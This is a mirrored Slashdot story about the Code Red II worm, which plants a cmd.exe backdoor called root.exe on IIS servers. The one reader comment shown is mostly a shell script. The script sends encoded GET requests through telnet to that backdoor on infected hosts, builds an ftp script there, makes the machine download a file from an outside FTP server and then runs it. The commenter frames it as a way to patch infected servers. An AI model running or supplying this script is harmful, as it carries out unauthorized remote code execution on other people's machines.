Slashdot Mirror

← Back to Stories (view on slashdot.org)

Code Red II: Shells for the Taking

Posted by CmdrTaco on from the it-keeps-getting-more-and-more-comical dept.

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

1 of 602 comments (clear)

  1. File download script by nebby · · Score: 5, Interesting

    (Copied from the other thread, for those who are working on a way to fix this worm)

    I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


    #!/bin/sh
    # Code Red ][ Download File script
    # Usage: dlfile.sh infectedIP filename
    #
    # Please set the $ftp and $dir values to
    # the ftp and directory of the patch and shutdown repository

    # For ftp.youhavesetup.com
    FTP="ftp%2eyouhavesetup%2ecom"
    # Directory /pub/cr
    DIR="%2fpub%2fcr"

    echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
    # Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
    sleep 1
    echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


    I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

    --
    --